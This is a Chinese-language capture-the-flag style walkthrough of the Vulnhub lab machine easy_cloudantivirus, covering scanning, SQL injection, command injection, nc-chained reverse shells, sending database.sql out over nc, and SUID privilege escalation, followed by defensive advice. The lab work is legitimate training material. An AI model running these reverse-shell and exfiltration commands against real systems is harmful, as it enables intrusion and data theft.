Vulnhub靶机 easy_cloudantivirus 打靶 渗透详细过程
字数 1129 2025-08-19 12:42:32
Vulnhub靶机 easy_cloudantivirus 渗透测试详细教程
靶机信息
- 名称: easy_cloudantivirus (BoredHackerBlog: Cloud AV)
- 下载地址: https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/
- 难度: 中等
环境准备
- 下载靶机OVA文件并导入VirtualBox
- 确保攻击机(Kali Linux)与靶机在同一网络
渗透测试流程
1. 主机发现
使用以下方法之一发现靶机IP地址:
# 方法1: arp-scan
sudo arp-scan -l
# 方法2: 循环arping扫描
for i in $(seq 1 254); do sudo arping -c 2 10.1.2.$i; done
2. 端口扫描与服务识别
使用nmap进行详细扫描:
nmap -p- 10.1.2.126 # 全端口扫描
nmap -sV -A 10.1.2.126 # 服务版本探测
扫描结果通常显示开放端口:
- 22/tcp - SSH
- 8080/tcp - HTTP服务
3. Web渗透测试
3.1 访问Web界面
访问 http://10.1.2.126:8080 发现是一个扫描器网站,需要输入邀请码才能使用。
3.2 SQL注入漏洞利用
- 使用Burp Suite拦截请求
- 发现
password参数存在SQL注入漏洞 - 使用模糊测试字典进行测试
测试闭合方式后,成功注入获取多个有效邀请码:
- myinvitecode123
- mysecondinvitecode
- cloudavtech
- mostsecurescanner
3.3 命令注入漏洞
- 使用获取的邀请码登录扫描功能
- 尝试命令注入:
bash | ls
成功回显当前目录文件列表
4. 反弹Shell获取初始访问
4.1 尝试常规反弹Shell
bash | nc 10.1.2.218 8888 -e /bin/bash
(可能失败,因为靶机nc不支持-e参数)
4.2 使用NC串联方法
bash | nc 10.1.2.218 6666 | /bin/bash | nc 10.1.2.218 8888
攻击机需要同时监听两个端口:
nc -lvvp 6666 # 输入命令
nc -lvvp 8888 # 接收输出
4.3 获取稳定Shell
python -c "import pty;pty.spawn('/bin/bash')"
5. 权限提升
5.1 信息收集
- 发现
database.sql文件,传输到本地分析:
# 靶机
nc 10.1.2.218 5555 < database.sql
# 攻击机
nc -lvvp 5555 > database.sql
- 使用sqlite3查看数据库内容:
sqlite3 database.sql
.dump
5.2 尝试SSH爆破
- 查看系统用户:
cat /etc/passwd | grep /bin/bash
- 使用之前获取的密码尝试爆破(通常不成功)
5.3 提权利用
- 查找SUID文件:
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
- 发现
updata_cloudav可执行文件,属主为root - 查看源代码并分析漏洞
- 利用命令注入提权:
./updata_cloudav "1|nc 10.1.2.218 9999 | /bin/bash | nc 10.1.2.218 7777"
- 攻击机监听相应端口获取root shell
总结
完整渗透流程:
- 主机发现 → 2. 端口扫描 → 3. Web渗透(SQL注入) → 4. 命令注入 → 5. 反弹Shell → 6. 信息收集 → 7. 权限提升
关键点:
- Web界面的SQL注入漏洞
- 扫描功能的命令注入漏洞
- NC串联反弹Shell技术
- 可执行文件的命令注入提权
防御建议
- 对用户输入进行严格过滤
- 避免使用危险函数如system()、exec()
- 最小化SUID权限设置
- 使用参数化查询防止SQL注入
- 更新系统组件修复已知漏洞